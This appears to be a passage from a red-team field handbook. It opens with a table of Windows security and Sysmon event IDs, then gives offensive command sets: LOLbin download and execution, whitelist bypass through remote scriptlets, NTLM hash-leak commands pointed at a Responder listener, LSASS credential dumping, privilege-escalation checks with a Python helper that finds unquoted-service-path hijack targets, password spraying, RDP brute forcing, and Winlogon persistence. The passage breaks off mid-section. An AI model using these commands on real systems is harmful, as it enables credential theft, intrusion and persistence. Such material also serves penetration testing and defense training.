4784 A basic application group was changed
4785 A member was added to a basic application group
4786 A member was removed from a basic application group
4787 A non-member was added to a basic application group
4788 A non-member was removed from a basic application group.
4789 A basic application group was deleted
4790 An LDAP query group was created
4791 A basic application group was changed
4792 An LDAP query group was deleted

4793 The Password Policy Checking API was called
4794 An attempt was made to set the Directory Services Restore Mode administrator password
4797 An attempt was made to query the existence of a blank password for an account
4798 A user's local group membership was enumerated.
4799 A security-enabled local group membership was enumerated
4800 The workstation was locked
4801 The workstation was unlocked
4802 The screen saver was invoked
4803 The screen saver was dismissed
4816 RPC detected an integrity violation while decrypting an incoming message
4817 Auditing settings on object were changed.
4818 Proposed Central Access Policy does not grant the same access permissions as the current Central Access Policy
4819 Central Access Policies on the machine have been changed
4820 A Kerberos Ticket-granting-ticket (TGT) was denied because the device does not meet the access control restrictions
4821 A Kerberos service ticket was denied because the user, device, or both does not meet the access control restrictions
4822 NTLM authentication failed because the account was a member of the Protected User group
4823 NTLM authentication failed because access control restrictions are required
4824 Kerberos preauthentication by using DES or RC4 failed because the account was a member of the Protected User group
4825 A user was denied the access to Remote Desktop. By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group
4826 Boot Configuration Data loaded
4830 SID History was removed from an account
4864 A namespace collision was detected
4865 A trusted forest information entry was added
4866 A trusted forest information entry was removed
4867 A trusted forest information entry was modified
4868 The certificate manager denied a pending certificate request
4869 Certificate Services received a resubmitted certificate request
4870 Certificate Services revoked a certificate
4871 Certificate Services received a request to publish the certificate revocation list (CRL)
4872 Certificate Services published the certificate revocation list (CRL)
4873 A certificate request extension changed
4874 One or more certificate request attributes changed.
4875 Certificate Services received a request to shut down
4876 Certificate Services backup started
4877 Certificate Services backup completed
4878 Certificate Services restore started
4879 Certificate Services restore completed
4880 Certificate Services started
4881 Certificate Services stopped
4882 The security permissions for Certificate Services changed
4883 Certificate Services retrieved an archived key
4884 Certificate Services imported a certificate into its database
4885 The audit filter for Certificate Services changed
4886 Certificate Services received a certificate request
4887 Certificate Services approved a certificate request and issued a certificate
4888 Certificate Services denied a certificate request
4889 Certificate Services set the status of a certificate request to pending
4890 The certificate manager settings for Certificate Services changed.
4891 A configuration entry changed in Certificate Services
4892 A property of Certificate Services changed
4893 Certificate Services archived a key
4894 Certificate Services imported and archived a key
4895 Certificate Services published the CA certificate to Active Directory Domain Services
4896 One or more rows have been deleted from the certificate database
4897 Role separation enabled
4898 Certificate Services loaded a template
4899 A Certificate Services template was updated
4900 Certificate Services template security was updated
4902 The Per-user audit policy table was created
4904 An attempt was made to register a security event source
4905 An attempt was made to unregister a security event source
4906 The CrashOnAuditFail value has changed
4907 Auditing settings on object were changed
4908 Special Groups Logon table modified
4909 The local policy settings for the TBS were changed
4910 The group policy settings for the TBS were changed
4911 Resource attributes of the object were changed
4912 Per User Audit Policy was changed
4913 Central Access Policy on the object was changed

4928 An Active Directory replica source naming context was established
4929 An Active Directory replica source naming context was removed
4930 An Active Directory replica source naming context was modified
4931 An Active Directory replica destination naming context was modified
4932 Synchronization of a replica of an Active Directory naming context has begun
4933 Synchronization of a replica of an Active Directory naming context has ended
4934 Attributes of an Active Directory object were replicated
4935 Replication failure begins
4936 Replication failure ends
4937 A lingering object was removed from a replica
4944 The following policy was active when the Windows Firewall started
4945 A rule was listed when the Windows Firewall started
4946 A change has been made to Windows Firewall exception list. A rule was added
4947 A change has been made to Windows Firewall exception list. A rule was modified
4948 A change has been made to Windows Firewall exception list. A rule was deleted
4949 Windows Firewall settings were restored to the default values
4950 A Windows Firewall setting has changed
4951 A rule has been ignored because its major version number was not recognized by Windows Firewall
4952 Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall
4953 A rule has been ignored by Windows Firewall because it could not parse the rule
4954 Windows Firewall Group Policy settings has changed. The new settings have been applied
4956 Windows Firewall has changed the active profile
4957 Windows Firewall did not apply the following rule
4958 Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer
4960 IPsec dropped an inbound packet that failed an integrity check
4961 IPsec dropped an inbound packet that failed a replay check
4962 IPsec dropped an inbound packet that failed a replay check
4963 IPsec dropped an inbound clear text packet that should have been secured
4964 Special groups have been assigned to a new logon
4965 IPsec received a packet from a remote computer with an incorrect Security Parameter Index (SPI).
4976 During Main Mode negotiation, IPsec received an invalid negotiation packet.
4977 During Quick Mode negotiation, IPsec received an invalid negotiation packet.
4978 During Extended Mode negotiation, IPsec received an invalid negotiation packet.
4979 IPsec Main Mode and Extended Mode security associations were established.
4980 IPsec Main Mode and Extended Mode security associations were established
4981 IPsec Main Mode and Extended Mode security associations were established
4982 IPsec Main Mode and Extended Mode security associations were established
4983 An IPsec Extended Mode negotiation failed
4984 An IPsec Extended Mode negotiation failed
4985 The state of a transaction has changed
5024 The Windows Firewall Service has started successfully
5025 The Windows Firewall Service has been stopped
5027 The Windows Firewall Service was unable to retrieve the security policy from the local storage
5028 The Windows Firewall Service was unable to parse the new security policy.
5029 The Windows Firewall Service failed to initialize the driver
5030 The Windows Firewall Service failed to start
5031 The Windows Firewall Service blocked an application from accepting incoming connections on the network.
5032 Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network
5033 The Windows Firewall Driver has started successfully
5034 The Windows Firewall Driver has been stopped
5035 The Windows Firewall Driver failed to start
5037 The Windows Firewall Driver detected critical runtime error. Terminating
5038 Code integrity determined that the image hash of a file is not valid
5039 A registry key was virtualized.
5040 A change has been made to IPsec settings. An Authentication Set was added.
5041 A change has been made to IPsec settings. An Authentication Set was modified
5042 A change has been made to IPsec settings. An Authentication Set was deleted
5043 A change has been made to IPsec settings. A Connection Security Rule was added
5044 A change has been made to IPsec settings. A Connection Security Rule was modified
5045 A change has been made to IPsec settings. A Connection Security Rule was deleted
5046 A change has been made to IPsec settings. A Crypto Set was added
5047 A change has been made to IPsec settings. A Crypto Set was modified
5048 A change has been made to IPsec settings. A Crypto Set was deleted
5049 An IPsec Security Association was deleted
5050 An attempt to programmatically disable the Windows Firewall using a call to [Link](FALSE)
5051 A file was virtualized
5056 A cryptographic self test was performed
5057 A cryptographic primitive operation failed
5058 Key file operation
5059 Key migration operation
5060 Verification operation failed
5061 Cryptographic operation
5062 A kernel-mode cryptographic self test was performed
5063 A cryptographic provider operation was attempted
5064 A cryptographic context operation was attempted
5065 A cryptographic context modification was attempted
5066 A cryptographic function operation was attempted
5067 A cryptographic function modification was attempted
5068 A cryptographic function provider operation was attempted
5069 A cryptographic function property operation was attempted
5070 A cryptographic function property operation was attempted
5071 Key access denied by Microsoft key distribution service
5120 OCSP Responder Service Started
5121 OCSP Responder Service Stopped
5122 A Configuration entry changed in the OCSP Responder Service
5123 A configuration entry changed in the OCSP Responder Service
5124 A security setting was updated on OCSP Responder Service
5125 A request was submitted to OCSP Responder Service
5126 Signing Certificate was automatically updated by the OCSP Responder Service
5127 The OCSP Revocation Provider successfully updated the revocation information
5136 A directory service object was modified
5137 A directory service object was created
5138 A directory service object was undeleted

5139 A directory service object was moved
5140 A network share object was accessed
5141 A directory service object was deleted
5142 A network share object was added.
5143 A network share object was modified
5144 A network share object was deleted.
5145 A network share object was checked to see whether client can be granted desired access
5146 The Windows Filtering Platform has blocked a packet
5147 A more restrictive Windows Filtering Platform filter has blocked a packet
5148 The Windows Filtering Platform has detected a DoS attack and entered a defensive mode; packets associated with this attack will be discarded.
5149 The DoS attack has subsided and normal processing is being resumed.
5150 The Windows Filtering Platform has blocked a packet.
5151 A more restrictive Windows Filtering Platform filter has blocked a packet.
5152 The Windows Filtering Platform blocked a packet
5153 A more restrictive Windows Filtering Platform filter has blocked a packet
5154 The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections
5155 The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections
5156 The Windows Filtering Platform has allowed a connection
5157 The Windows Filtering Platform has blocked a connection
5158 The Windows Filtering Platform has permitted a bind to a local port
5159 The Windows Filtering Platform has blocked a bind to a local port
5168 Spn check for SMB/SMB2 fails.
5169 A directory service object was modified
5170 A directory service object was modified during a background cleanup task
5376 Credential Manager credentials were backed up
5377 Credential Manager credentials were restored from a backup
5378 The requested credentials delegation was disallowed by policy
5379 Credential Manager credentials were read
5380 Vault Find Credential
5381 Vault credentials were read
5382 Vault credentials were read
5440 The following callout was present when the Windows Filtering Platform Base Filtering Engine started
5441 The following filter was present when the Windows Filtering Platform Base Filtering Engine started
5442 The following provider was present when the Windows Filtering Platform Base Filtering Engine started
5443 The following provider context was present when the Windows Filtering Platform Base Filtering Engine started
5444 The following sub-layer was present when the Windows Filtering Platform Base Filtering Engine started
5446 A Windows Filtering Platform callout has been changed
5447 A Windows Filtering Platform filter has been changed
5448 A Windows Filtering Platform provider has been changed
5449 A Windows Filtering Platform provider context has been changed
5450 A Windows Filtering Platform sub-layer has been changed
An IPsec Quick Mode security association was
5451 established
5452 An IPsec Quick Mode security association ended
An IPsec negotiation with a remote computer failed
because the IKE and AuthIP IPsec Keying Modules
5453 (IKEEXT) service is not started
PAStore Engine applied Active Directory storage IPsec
5456 policy on the computer
PAStore Engine failed to apply Active Directory storage
5457 IPsec policy on the computer
PAStore Engine applied locally cached copy of Active
5458 Directory storage IPsec policy on the computer
PAStore Engine failed to apply locally cached copy of
5459 Active Directory storage IPsec policy on the computer
PAStore Engine applied local registry storage IPsec
5460 policy on the computer
PAStore Engine failed to apply local registry storage
5461 IPsec policy on the computer
PAStore Engine failed to apply some rules of the active
5462 IPsec policy on the computer
PAStore Engine polled for changes to the active IPsec
5463 policy and detected no changes
PAStore Engine polled for changes to the active IPsec
policy, detected changes, and applied them to IPsec
5464 Services
PAStore Engine received a control for forced reloading
5465 of IPsec policy and processed the control successfully
PAStore Engine polled for changes to the Active
Directory IPsec policy, determined that Active
Directory cannot be reached, and will use the cached
5466 copy of the Active Directory IPsec policy instead
PAStore Engine polled for changes to the Active
Directory IPsec policy, determined that Active
Directory can be reached, and found no changes to the
5467 policy

350
PAStore Engine polled for changes to the Active
Directory IPsec policy, determined that Active
Directory can be reached, found changes to the policy,
5468 and applied those changes
PAStore Engine loaded local storage IPsec policy on the
5471 computer
PAStore Engine failed to load local storage IPsec
5472 policy on the computer
PAStore Engine loaded directory storage IPsec policy on
5473 the computer
PAStore Engine failed to load directory storage IPsec
5474 policy on the computer
5477 PAStore Engine failed to add quick mode filter
5478 IPsec Services has started successfully
5479 IPsec Services has been shut down successfully
IPsec Services failed to get the complete list of
5480 network interfaces on the computer
IPsec Services failed to initialize RPC server. IPsec
5483 Services could not be started
IPsec Services has experienced a critical failure and
5484 has been shut down
IPsec Services failed to process some IPsec filters on
5485 a plug-and-play event for network interfaces
A request was made to authenticate to a wireless
5632 network
5633 A request was made to authenticate to a wired network
5712 A Remote Procedure Call (RPC) was attempted
5888 An object in the COM+ Catalog was modified
5889 An object was deleted from the COM+ Catalog
5890 An object was added to the COM+ Catalog
Security policy in the group policy objects has been
6144 applied successfully
One or more errors occured while processing security
6145 policy in the group policy objects
6272 Network Policy Server granted access to a user
6273 Network Policy Server denied access to a user
6274 Network Policy Server discarded the request for a user
Network Policy Server discarded the accounting request
6275 for a user
6276 Network Policy Server quarantined a user
Network Policy Server granted access to a user but put
it on probation because the host did not meet the
6277 defined health policy
Network Policy Server granted full access to a user
6278 because the host met the defined health policy
Network Policy Server locked the user account due to
6279 repeated failed authentication attempts
6280 Network Policy Server unlocked the user account
Code Integrity determined that the page hashes of an
6281 image file are not valid...

351
BranchCache: Received an incorrectly formatted response
6400 while discovering availability of content.
BranchCache: Received invalid data from a peer. Data
6401 discarded.
BranchCache: The message to the hosted cache offering
6402 it data is incorrectly formatted.
BranchCache: The hosted cache sent an incorrectly
formatted response to the client's message to offer it
6403 data.
BranchCache: Hosted cache could not be authenticated
6404 using the provisioned SSL certificate.
6405 BranchCache: %2 instance(s) of event id %1 occurred.
%1 registered to Windows Firewall to control filtering
6406 for the following:
6407 0.01
Registered product %1 failed and Windows Firewall is
6408 now controlling the filtering for %2.
BranchCache: A service connection point object could
6409 not be parsed
Code integrity determined that a file does not meet the
security requirements to load into a process. This
could be due to the use of shared sections or other
6410 issues
6416 A new external device was recognized by the system.
6417 The FIPS mode crypto selftests succeeded
6418 The FIPS mode crypto selftests failed
6419 A request was made to disable a device
6420 A device was disabled
6421 A request was made to enable a device
6422 A device was enabled
The installation of this device is forbidden by system
6423 policy
The installation of this device was allowed, after
6424 having previously been forbidden by policy
8191 Highest System-Defined Audit Message Value

WINDOWS SYSMON LOG EVENTS

ID DESCRIPTION
1 Process creation
2 A process changed a file creation time
3 Network connection
4 Sysmon service state changed
5 Process terminated
6 Driver loaded
7 Image loaded
8 CreateRemoteThread
9 RawAccessRead
10 ProcessAccess
11 FileCreate
12 RegistryEvent (Object create and delete)
13 RegistryEvent (Value Set)
14 RegistryEvent (Key and Value Rename)
15 FileCreateStreamHash
16 Sysmon config state changed
17 Pipe created
18 Pipe connected
19 WmiEventFilter activity detected
20 WmiEventConsumer activity detected
21 WmiEventConsumerToFilter activity detected
22 DNSEvent (DNS query)
255 Error

REFERENCE:
[Link]
analysis/170/download?utm_source=share&utm_medium=ios_app&utm_name=iossmf
[Link]
places-where-you-can-find-evidence
[Link]
[Link]
[Link]
brent-muir
[Link]
[Link]
collection
[Link]

WINDOWS_Exploit
RED TEAM EXPLOITATION WINDOWS

WINDOWS LOLbins
A LOLBin (living-off-the-land binary) is any binary supplied by the
operating system that is normally used for legitimate purposes but can
also be abused by malicious actors. Several default system binaries
have unexpected side effects (downloading, executing or copying
arbitrary content) that let attackers carry out post-exploitation
actions with signed, already-present tooling and so hide their activity.

EXECUTE LOLbins
[Link] at 07:30 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\[Link]

[Link] /start [Link]

[Link] -c [Link]

bitsadmin /CREATE 1 & bitsadmin /ADDFILE 1 c:\windows\system32\[Link] c:\data\playfolder\[Link] & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\[Link] NULL & bitsadmin /RESUME 1 & bitsadmin /RESET

[Link] [Link],RouteTheCall [Link]

[Link] \path\to\[Link]

[Link] -e /mnt/c/Windows/System32/[Link]

DOWNLOAD LOLbins
bitsadmin /CREATE 1 & bitsadmin /ADDFILE 1 [Link] c:\data\playfolder\[Link] & bitsadmin /RESUME 1 & bitsadmin /COMPLETE 1

[Link] -urlcache -split -f [Link] [Link]

[Link] [Link]
#Places download in cache folder

[Link] [Link]
#Places download in cache folder

[Link] [Link]

[Link] \\<[Link]>\path\[Link] c:\path\outdir /A

COPY LOLbins
[Link] /y C:\path\dir\src_example.vbs /d C:\path\dir\dst_example.vbs /o

expand c:\path\dir\src_example.bat c:\path\dir\dst_example.bat

[Link] C:\path\dir\[Link] C:\path\outdir\ /A

ENCODE LOLbins
certutil -encode input_example.txt encoded_example.txt

DECODE LOLbins
certutil -decode encoded_example.txt output_example.txt

APPLICATION WHITELIST BYPASS LOLbins
#Execute a ClickOnce application from <URL>:
[Link] -c [Link]

[Link] [Link],ShOpenVerbApplication [Link]

#Execute the specified remote .SCT script with [Link]:
regsvr32 /s /n /u /i:[Link] [Link]

#Execute the specified local .SCT script with [Link]:
[Link] /s /u /i:[Link] [Link]

CREDENTIALS LOLbins
#List cached credentials:
cmdkey /list

#Export plaintext local wireless passwords:
netsh wlan export profile key=clear

COMPILE LOLbins
[Link] -out:[Link] [Link]
[Link] -target:library -out:[Link] [Link]

#Compile JavaScript code in [Link] & output [Link]:
[Link] [Link]

HASH LEAK LOLbins

DOS COMMANDS
Various Windows commands can be used to elicit an NTLMv1/v2
authentication leak to a listener such as Responder. Their usefulness
in an actual scenario I'll leave up to the user.
C:\> dir \\<Responder_IPAddr>\C$
C:\> regsvr32 /s /u /i://<Responder_IPAddr>/blah [Link]
C:\> echo 1 > //<Responder_IPAddr>/blah
C:\> pushd \\<Responder_IPAddr>\C$\blah
C:\> cmd /k \\<Responder_IPAddr>\C$\blah
C:\> cmd /c \\<Responder_IPAddr>\C$\blah
C:\> start \\<Responder_IPAddr>\C$\blah
C:\> mkdir \\<Responder_IPAddr>\C$\blah
C:\> type \\<Responder_IPAddr>\C$\blah
C:\> rpcping -s <Responder_IPAddr> -e 1234 -a privacy -u NTLM

POWERSHELL COMMANDS
Various Windows PowerShell commands can be used to elicit an NTLMv1/v2
authentication leak. Their usefulness in a scenario I'll leave up to
the user.
PS> Invoke-Item \\<Responder_IPAddr>\C$\blah
PS> Get-Content \\<Responder_IPAddr>\C$\blah
PS> Start-Process \\<Responder_IPAddr>\C$\blah

DUMP LOLbins
#dump LSASS with rundll32 (ordinal #24 is the MiniDump export; requires administrator privileges / SeDebugPrivilege)
[Link] C:\Windows\System32\[Link] #24 "<PID> [Link] full"
[Link] [Link] #24 "<PID> [Link] full"

#dump process by pid; requires administrator privileges
[Link] -dumpFull -attach <PID>

#diskshadow to exfiltrate data from VSS such as [Link]
[Link] /s c:\test\[Link]

REFERENCE:
[Link]

WINDOWS PRIVILEGE ESCALATION

Groups on Target System
net localgroup
Get-LocalGroup | ft Name

Users in Administrators Group
net localgroup Administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

User Autologon Registry Entries
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

List Credential Manager Cache/Locations
cmdkey /list
dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Identify if Target User can access SAM and SYSTEM files


%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Weak folder permissions: Full Permissions Everyone/Users
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"

Weak folder permissions: Modify Permissions Everyone/Users
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"

#-match takes a .NET regex, so the backslash in BUILTIN\Users is doubled:
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\\Users'} } catch {}}

Processes and services
tasklist /svc
tasklist /v
net start
sc query

Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

Unquoted service paths
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
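Added example (not from the handbook): the same unquoted-path filter applied offline to the Name/PathName/StartMode fields that the wmic or gwmi query above returns, plus the part the one-liners leave to the reader: for each hit, the executables Windows would try before the real one (the prefix before each space, with .exe appended). A finding only becomes a privilege escalation when the current user can write to the directory holding one of those candidates, which is what the icacls checks earlier in this section establish. The service records are constructed sample data and the function names are this example's own.

```python
import re

# Constructed sample records in the shape of
# `wmic service get name,pathname,startmode` / Get-WmiObject Win32_Service output.
SAMPLE_SERVICES = [
    {"Name": "VulnSvc", "StartMode": "Auto",
     "PathName": r"C:\Program Files\Vendor App\Sub Dir\svc.exe -config default"},
    {"Name": "QuotedSvc", "StartMode": "Auto",
     "PathName": r'"C:\Program Files\Other App\other.exe" -run'},
    {"Name": "SysSvc", "StartMode": "Auto",
     "PathName": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    {"Name": "ManualSvc", "StartMode": "Manual",
     "PathName": r"C:\Program Files\Manual App\manual.exe"},
    {"Name": "NoSpaceSvc", "StartMode": "Auto",
     "PathName": r"C:\Apps\nospace\run.exe"},
]


def hijack_candidates(pathname):
    r"""Return the paths Windows would try before the intended binary.

    For an unquoted ImagePath containing spaces, CreateProcess treats the
    text before each space as a possible program name and appends .exe:
    'C:\Program Files\Vendor App\svc.exe' is tried as 'C:\Program.exe',
    then 'C:\Program Files\Vendor.exe', before the real file.
    A quoted path, or one without spaces, is unambiguous and yields [].
    """
    if pathname.startswith('"'):
        return []
    # Keep only the executable: arguments after the first .exe are dropped.
    m = re.match(r"(?i)(.*?\.exe)", pathname)
    exe = m.group(1) if m else pathname
    candidates = []
    idx = exe.find(" ")
    while idx != -1:
        candidates.append(exe[:idx] + ".exe")
        idx = exe.find(" ", idx + 1)
    return candidates


def find_unquoted_services(services):
    r"""Apply the handbook's filter offline: Auto-start services outside
    C:\Windows whose PathName is unquoted and contains a space.
    Returns [(name, pathname, [candidate paths tried first])]."""
    hits = []
    for svc in services:
        path = svc["PathName"]
        if svc["StartMode"].lower() != "auto":
            continue
        if path.lower().startswith(r"c:\windows"):
            continue
        candidates = hijack_candidates(path)
        if candidates:
            hits.append((svc["Name"], path, candidates))
    return hits


if __name__ == "__main__":
    for name, path, candidates in find_unquoted_services(SAMPLE_SERVICES):
        print(f"[!] {name}: {path}")
        for c in candidates:
            # Exploitable only if the parent directory of c is writable by
            # the current user; confirm with icacls on the host.
            print(f"    would be tried first: {c}")
```

Feed it the real records by exporting the wmic output to CSV (`wmic service get name,pathname,startmode /format:csv`) and building the same list of dicts; the candidate list then tells you exactly which directories to test with icacls, and which file name the payload must have.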

Scheduled Tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
dir C:\windows\tasks

Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State

Startup Items
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"

Network Configuration
ipconfig /all
route print
arp -a
netstat -ano
type C:\WINDOWS\System32\drivers\etc\hosts
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh dump

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

Registry Passwords
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s

Image Build Artifacts Credentials
dir /s *[Link] *[Link] *[Link] *[Link] *[Link] 2>nul

Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

User Directories Search Passwords
dir C:\Users\<USER>\ /s *pass* == *vnc* == *.config* 2>nul
findstr C:\Users\ /si password *.xml *.ini *.txt *.config 2>nul

Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
Get-ChildItem -Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue

WindowsEnum
[Link]
A PowerShell privilege escalation enumeration script. It automates most
of what is detailed in [Link]
Guide/.

#Quick standard checks.
.\WindowsEnum.ps1
#Directly from Terminal
powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1

#Extended checks: search config files, interesting files, & passwords (be patient).
.\WindowsEnum.ps1 extended
#Directly from Terminal
powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1 extended

Windows Exploit Suggester - Next Generation (WES-NG)
[Link]
WES-NG is a tool based on the output of Windows' systeminfo utility
which lists the vulnerabilities the OS is affected by, including any
public exploits for them. Every Windows OS between Windows XP and
Windows 10, including their Windows Server counterparts, is supported.

#Obtain the latest database of vulnerabilities:
[Link] --update
#Collect systeminfo output from the target host into a file, either
#locally or from a remote system with the /S switch:
#Local
systeminfo > [Link]
#Remote
[Link] /S MyRemoteHost > [Link]
#Determine missing patches and matching exploits from the systeminfo
#output file:
[Link] [Link]
#Add --muc-lookup to validate the identified missing patches against
#Microsoft's Update Catalog.

Windows Scheduler SYSTEM Privilege Escalation Technique
#Jobs created with at run as SYSTEM. The at command is deprecated from
#Windows 8 / Server 2012 onward; use schtasks /create /ru SYSTEM there.
$> net use \\[TargetIP]\ipc$ password /user:username
$> net time \\[TargetIP]
$> at \\[TargetIP] 12:00 pm tftp -I [MyIP] GET [Link]
OR
$> at \\[TargetIP] 12:00 pm C:\Temp\[Link]

PowerSploit
[Link]
#Copy Privesc folder to PowerShell module directory. To find the
directory execute $Env:PSModulePath
#Import the module
Import-Module Privesc
#To run all privesc checks on the system
Invoke-AllChecks

Simple One-liner Password Spraying
#Check the domain lockout threshold and observation window first, and
#keep attempts per account below that threshold within the window:
net accounts /domain
#Get users on the domain into a text file:
net user /domain > [Link]
#Echo passwords into a file:
echo "password1" >> [Link]
echo "Spring2020" >> [Link]
#One-liner to spray [Link] against [Link] (typed at an interactive
#cmd prompt; inside a .bat file the % variables must be doubled):
@FOR /F %n in ([Link]) DO @FOR /F %p in ([Link]) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]\IPC$ > NUL

Windows OS Command Injection
[Link]
list/blob/master/[Link]

Export Plaintext Local Wireless Passwords


$> netsh wlan export profile key=clear

Search local system for passwords
$> findstr /si pass *.xml *.doc *.txt *.xls *.cfg
$> ls -R | select-string -Pattern password

REFERENCE:
!!!BEST!!!-> [Link]
Escalation-Guide/
[Link]
[Link]
[Link]
[Link]
%20and%20Resources/Windows%20-%20Privilege%[Link]
[Link]
unquoted-service-path-c7a011a8d8ae

RDP EXPLOITATION

XFREERDP - Simple User Enumeration Windows Target (Kerberos based)
#Syntax = xfreerdp /v:<target_ip> -sec-nla /u:""
xfreerdp /v:[Link] -sec-nla /u:""

XFREERDP - Login
#Syntax = xfreerdp /u:<user> /g:<rd_gateway> /p:<pass> /v:<target_ip>
xfreerdp /u:<USERNAME> /g:<RD_GATEWAY> /p:<PASS> /v:[Link]

NCRACK - Wordlist based bruteforce RDP
[Link]
#--user <name> or -U <username_wordlist>; --pass <pass> or -P <password_wordlist>
ncrack -vv -U <username_wordlist> -P <password_wordlist> -s <target_ip>:3389

ncrack -vv --user <USERNAME> -P [Link] -s [Link]:3389

CROWBAR - Bruteforce Tool
[Link]
#-u <user> or -U <user_wordlist>; -c <password> or -C <password_wordlist>
[Link] -b rdp -U <user_wordlist> -C <password_wordlist> -s <target_ip>/32 -v

[Link] -b rdp -u <user> -C <password_wordlist> -s <target_ip>/32 -v

#To use username with a DOMAIN
[Link] -b rdp -u <DOMAIN>\\<USER> -c <PASS> -s [Link]/32

WINDOWS PERSISTENCE
SC Service Creation
sc create newservice type= own type= interact binPath= "C:\windows\system32\[Link] /c [Link]" & sc start newservice

Winlogon Helper DLL Shell
Requires modification of the following registry value:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
#Modify registry with below commands:
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "[Link], [Link]" /f
#Or PowerShell
Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "[Link], [Link]" -Force

Winlogon Helper DLL UserInit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
#Modify registry with below commands:
